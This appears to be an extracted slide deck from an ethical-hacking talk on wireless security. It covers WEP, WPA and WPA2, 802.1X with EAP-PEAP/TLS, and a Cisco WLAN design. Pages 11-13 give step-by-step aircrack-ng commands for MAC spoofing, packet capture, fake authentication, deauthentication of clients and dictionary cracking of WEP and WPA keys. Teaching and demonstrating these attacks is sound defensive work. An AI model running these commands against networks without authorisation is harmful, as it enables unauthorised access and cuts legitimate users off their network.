Network Security and Ethical Hacking - Wireless Jason Maynard CCDA, CCIP, CCNP, GSEC, GCFW Infrastructure Architect


Page 1: Network Security and Ethical Hacking

Network Security and Ethical Hacking - Wireless

Jason Maynard, CCDA, CCIP, CCNP, GSEC, GCFW
Infrastructure Architect

Page 2: Network Security and Ethical Hacking


• Is it Secure?

It really depends on the methods used to secure it.

Page 3: Network Security and Ethical Hacking


Encryption and Authentication Methods

Page 4: Network Security and Ethical Hacking

WEP

Short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the 802.11b standard.

Page 5: Network Security and Ethical Hacking


WPA

Short for Wi-Fi Protected Access, a Wi-Fi standard that was designed to improve upon the security features of WEP.

Page 6: Network Security and Ethical Hacking

WPA2

Short for Wi-Fi Protected Access 2, the follow-on security method to WPA for wireless networks that provides stronger data protection and network access control. Based on the IEEE 802.11i standard.

Page 7: Network Security and Ethical Hacking

MAC authentication is easy to sniff and spoof, and the SSID can still be obtained by sniffing the network.

Page 8: Network Security and Ethical Hacking

Couple of demos
• WEP
• WPA

Page 9: Network Security and Ethical Hacking

Items Needed
• USB key with Backtrack3 (Linux distro used for ethical hacking)
• DWA-642 PCMCIA card (Atheros chipset; uses the madwifi-ng driver)
• Access point running WEP and then WPA
• 2 client laptops running Linux and Windows connecting to the AP

Page 10: Network Security and Ethical Hacking

Command Line Tools

• ifconfig
• iwconfig
• macchanger
• airmon-ng
• airodump-ng
• aireplay-ng
• aircrack-ng

Page 11: Network Security and Ethical Hacking

Open a couple of terminals
– Type “iwconfig” to identify the cards
– Type “ifconfig” to determine which cards are up
– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the cards are not running in monitor mode
– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the interface is down

Page 12: Network Security and Ethical Hacking

– Type “macchanger --mac 00:11:22:33:44:55 wifi0” (changes the MAC address)
– Type “airmon-ng start wifi0” (puts the card in monitor mode)
– Type “airodump-ng ath0”, find an AP that is running WEP or WPA, then copy the SSID and stop the scan

WEP Cracking
– Type “airodump-ng -w wep.cap -c “channel #” --bssid “SSID in HEX” ath0” (this captures packets sent to the AP)
– New terminal
– Type “aireplay-ng -1 0 -a “SSID” -h “MAC in HEX” ath0” (this fakes authentication)

Page 13: Network Security and Ethical Hacking

– Go to another terminal
– Type “aireplay-ng -2 -p 0841 -b “SSID” -h “MAC in HEX” ath0” (interactive packet replay)
– Go to another terminal
– Type “aircrack-ng wep*.cap”

WPA Cracking
– Type “airodump-ng -w wpa.cap -c “channel #” --bssid “SSID in HEX” ath0” (this captures packets sent to the AP)
– Type “aireplay-ng -0 5 -a “SSID” ath0” (deauthentication)
– Type “aircrack-ng -0 -x2 wpa*.cap -w /pentest/wireless/aircrack-ng/test/password.lst”

Page 14: Network Security and Ethical Hacking


So what do I do to protect my network and wireless users?

Page 15: Network Security and Ethical Hacking


Use WPA2 with 802.1x

Page 16: Network Security and Ethical Hacking

WPA2 provides government-grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication.

Page 17: Network Security and Ethical Hacking


802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.

Page 18: Network Security and Ethical Hacking

802.1X – The most secure methods
• EAP – PEAP
• EAP – TLS

Page 19: Network Security and Ethical Hacking

EAP – PEAP
• Uses server certificates and MSCHAPv2

Page 20: Network Security and Ethical Hacking

EAP – TLS
• One of the most secure methods; uses client and server certificates. More difficult to manage.

Page 21: Network Security and Ethical Hacking

Wireless LAN Solution

[Diagram: Cisco 4500; Catalyst 4000 series chassis; Cisco WLC 4400 (Cisco 4400 Series Wireless LAN Controller, model 4402, 25 AP); Cisco Aironet 1200 wireless access point; Novell Netware 6.5 SP5; Windows 2003 Ent Server running ACS 4.0; HP laptop using 802.1x (EAP-PEAP) with WPA2; links labeled SSL LDAP. Remote Sites (Mississauga): Catalyst 3560 series switch; Cisco 1242 LWAPP using HREAP to do local switching; HP laptop using 802.1x (EAP-PEAP) with WPA2.]

Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.

1. Users enter their Novell credentials to log onto the wireless network.
2. Cisco WLC forwards the user's credentials to the ACS server.
3. Cisco ACS forwards the credentials to the Netware 6.5 SP5 server, or the Windows 2003 Ent Server running ACS 4.0 will have eDirectory installed locally, making it more secure.
4. Novell checks its directory services for the user account and validates the user's credentials.
5. User is granted access to the WLAN.

Page 22: Network Security and Ethical Hacking

Supporting Products:

• FreeRadius and OpenSSL
• Microsoft Radius and Group Policy, Certificate Services
• Cisco ACS server and Local Authentication/AD/NDS

Page 23: Network Security and Ethical Hacking

Support Products Links:

Backtrack
• http://www.remote-exploit.org/backtrack_download.html

FreeRadius and OpenSSL
• http://wiki.freeradius.org
• http://www.openssl.org

Cisco ACS
• http://www.cisco.com/en/US/products/sw/secursw/ps2086

Microsoft
• http://www.microsoft.com/technet/security/prodtech/windowsserver2003/pkiwire/swlan.mspx?mfr=true
• http://technet.microsoft.com/en-us/magazine/cc162468.aspx

Page 24: Network Security and Ethical Hacking


Questions?